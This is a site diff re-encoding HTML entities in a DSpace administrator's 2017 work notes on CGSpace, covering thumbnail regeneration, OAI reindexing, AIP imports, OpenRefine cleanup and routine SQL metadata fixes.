<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
</code></pre><ul>
<li>So far there are almost 500:</li>
</ul>
@ -174,17 +174,17 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
</code></pre><ul>
<li>This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a &ldquo;checksum&rdquo; (ie, there was a bitstream in the submission):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>Then this one does the same, but for fields that don&rsquo;t contain checksums (ie, there was no bitstream in the submission):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*&#39; and text_value !~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.</li>
<li>It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled&hellip;</li>
<li>In that case it might just be better to see how many the user submitted (both <em>with</em> and <em>without</em> bitstreams):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*giampieri.*2016-.*&#39;;
</code></pre><h2 id="2017-04-05">2017-04-05</h2>
<ul>
<li>After doing a few more large communities it seems this is the final count of CMYK PDFs:</li>
@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
<li>The import command should theoretically catch situations like this where an item&rsquo;s metadata was updated, but in this case we changed the metadata schema and it doesn&rsquo;t seem to catch it (could be a bug!)</li>
<li>Attempting a full rebuild of OAI on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
...
58700 items imported so far...
@ -326,8 +326,8 @@ sys 1m29.310s
<li>One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see <code>harvester.autoStart</code> in <code>dspace/config/modules/oai.cfg</code>)</li>
<li>Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(435) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(435) is still referenced from table &#34;bundle&#34;.
</code></pre><h2 id="2017-04-18">2017-04-18</h2>
<ul>
<li>Helping Tsega test his new <a href="https://github.com/ilri/ckm-cgspace-rest-api">CGSpace REST API Rails app</a> on DSpace Test</li>
@ -342,7 +342,7 @@ $ rails -s
</code></pre><ul>
<li>I used Ansible to create a PostgreSQL user that only has <code>SELECT</code> privileges on the tables it needs:</li>
</ul>
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a &#39;db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
</code></pre><ul>
<li>Need to look into <a href="https://github.com/puma/puma/blob/master/docs/systemd.md">running this via systemd</a></li>
<li>This is interesting for creating runnable commands from <code>bundle</code>:</li>
@ -360,15 +360,15 @@ $ rails -s
<li>Looking at 933 CIAT records from Sisay, he&rsquo;s having problems creating a SAF bundle to import to DSpace Test</li>
<li>I started by looking at his CSV in OpenRefine, and I see there a <em>bunch</em> of fields with whitespace issues that I cleaned up:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot; ||&quot;,&quot;||&quot;).replace(&quot;|| &quot;,&quot;||&quot;).replace(&quot; || &quot;,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(&#34; ||&#34;,&#34;||&#34;).replace(&#34;|| &#34;,&#34;||&#34;).replace(&#34; || &#34;,&#34;||&#34;)
</code></pre><ul>
<li>Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:</li>
</ul>
<pre tabindex="0"><code>unescape(value,&quot;url&quot;)
<pre tabindex="0"><code>unescape(value,&#34;url&#34;)
</code></pre><ul>
<li>Then create the filename column using the following transform from URL:</li>
</ul>
<pre tabindex="0"><code>value.split('/')[-1].replace(/#.*$/,&quot;&quot;)
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1].replace(/#.*$/,&#34;&#34;)
</code></pre><ul>
<li>The <code>replace</code> part is because some URLs have an anchor like <code>#page=14</code> which we obviously don&rsquo;t want on the filename</li>
<li>Also, we need to only use the PDF on the item corresponding with page 1, so we don&rsquo;t end up with literally hundreds of duplicate PDFs</li>
@ -381,7 +381,7 @@ $ rails -s
<li>Looking at the CIAT data again, a bunch of items have metadata values ending in <code>||</code>, which might cause blank fields to be added at import time</li>
<li>Cleaning them up with OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace(/\|\|$/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/\|\|$/,&#34;&#34;)
</code></pre><ul>
<li>Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle</li>
<li>I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items</li>
@ -395,7 +395,7 @@ $ rails -s
</code></pre><ul>
<li>Add a description to the file names using:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test import of 933 records:</li>
</ul>
@ -409,8 +409,8 @@ $ wc -l /tmp/ciat
<li>More work on Ansible infrastructure stuff for Tsega&rsquo;s CKM DSpace REST API</li>
<li>I&rsquo;m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-22">2017-04-22</h2>
<ul>
<li>Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the <code>cleanup</code> task</li>
@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:</li>
</ul>
<pre tabindex="0"><code># grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
<pre tabindex="0"><code># grep -c &#39;IndexWriter is closed&#39; [dspace]/log/dspace.log.2017-04-*
[dspace]/log/dspace.log.2017-04-01:0
[dspace]/log/dspace.log.2017-04-02:0
[dspace]/log/dspace.log.2017-04-03:0

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="May, 2017"/>
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -159,7 +159,7 @@
<li>This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using <code>dspace cleanup -v</code>, or else you&rsquo;ll run out of disk space</li>
<li>In the end I realized it&rsquo;s better to use submission mode (<code>-s</code>) to ingest the community object as a single AIP without its children, followed by each of the collections:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The CGIAR Library metadata has some blank metadata values, which leads to <code>|||</code> in the Discovery facets</li>
<li>Clean these up in the database using:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up</li>
<li>Hours into the re-ingestion I ran into more errors, and had to erase everything and start over <em>again</em>!</li>
<li>Now, no matter what I do I keep getting foreign key errors&hellip;</li>
</ul>
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(80928) already exists.
</code></pre><ul>
<li>I think those errors actually come from me running the <code>update-sequences.sql</code> script while Tomcat/DSpace are running</li>
@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields</li>
<li>Finally finished importing all the CGIAR Library content, final method was:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The <code>-XX:-UseGCOverheadLimit</code> JVM option helps with some issues in large imports</li>
<li>After this I ran the <code>update-sequences.sql</code> script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><h2 id="2017-05-13">2017-05-13</h2>
<ul>
<li>After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually <a href="https://en.wikipedia.org/wiki/Null_character">NUL</a> characters in the <code>dc.description.abstract</code> field (at least) on the lines where CSV importing was failing</li>
@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Merge changes to CCAFS project identifiers and flagships: <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
<li>Run updates for CCAFS flagships on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>
<p>These include:</p>
@ -258,7 +258,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<ul>
<li>Looking into the error I get when trying to create a new collection on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot; Detail: Key (handle_id)=(84834) already exists.
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34; Detail: Key (handle_id)=(84834) already exists.
</code></pre><ul>
<li>I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn&rsquo;t helped</li>
<li>It appears item with <code>handle_id</code> 84834 is one of the imported CGIAR Library items:</li>
@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I&rsquo;ve posted on the dspace-test mailing list to see if I can just manually set the <code>handle_seq</code> to that value</li>
<li>Actually, it seems I can manually set the handle sequence using:</li>
</ul>
<pre tabindex="0"><code>dspace=# select setval('handle_seq',86873);
<pre tabindex="0"><code>dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre><ul>
<li>After that I can create collections just fine, though I&rsquo;m not sure if it has other side effects</li>
</ul>
@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested</li>
<li>Peter wanted a list of authors in here, so I generated a list of collections using the &ldquo;View Source&rdquo; on each community and this hacky awk:</li>
</ul>
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3&quot;/&quot;$4}' | awk -F\&quot; '{print $1}' | vim -
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ &#39;{print $3&#34;/&#34;$4}&#39; | awk -F\&#34; &#39;{print $1}&#39; | vim -
</code></pre><ul>
<li>Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
, '10947/2537', '10568/93761')));
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/1
0&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;109
47/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947
/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947
/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;,
&#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;109
47/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2
531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;
, &#39;10947/2537&#39;, &#39;10568/93761&#39;)));
</code></pre><ul>
<li>To get a CSV (with counts) from that:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*)
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/10&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;10947/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;10947/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;, &#39;10947/2537&#39;, &#39;10568/93761&#39;))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
</code></pre><h2 id="2017-05-23">2017-05-23</h2>
<ul>
<li>Add Affiliation to filters on Listing and Reports module (<a href="https://github.com/ilri/DSpace/pull/325">#325</a>)</li>
@ -343,21 +343,21 @@ COPY 111
<li>Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
<li>Find all of Amos Omore&rsquo;s author name variations so I can link them to his authority entry that has an ORCID:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Omore, A%&#39;;
</code></pre><ul>
<li>Set the authority for all variations to one containing an ORCID:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;4428ee88-90ef-4107-b837-3c0ec988520b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Omore, A%&#39;;
UPDATE 187
</code></pre><ul>
<li>Next I need to do Edgar Twine:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>But it doesn&rsquo;t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via &ldquo;Edit this Item&rdquo; and looked up his ORCID and linked it there</li>
<li>Now I should be able to set his name variations to the new authority:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;f70d0a01-d562-45b8-bca3-9cf7f249bc8b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>Run the corrections on CGSpace and then update discovery / authority</li>
<li>I notice that there are a handful of <code>java.lang.OutOfMemoryError: Java heap space</code> errors in the Catalina logs on CGSpace, I should go look into that&hellip;</li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="June, 2017"/>
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -133,7 +133,7 @@
<li>dc.format.extent: <code>value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[1].toNumber() - value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[0].toNumber()</code></li>
</ul>
</li>
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&quot;), create a new column with last page number:
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&rdquo;), create a new column with last page number:
<ul>
<li><code>cells[&quot;dc.page.from&quot;].value.toNumber() + cells[&quot;dc.format.pages&quot;].value.toNumber()</code></li>
</ul>
@ -153,7 +153,7 @@
<li>17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF</li>
<li>I&rsquo;ve flagged them and proceeded without them (752 total) on DSpace Test:</li>
</ul>
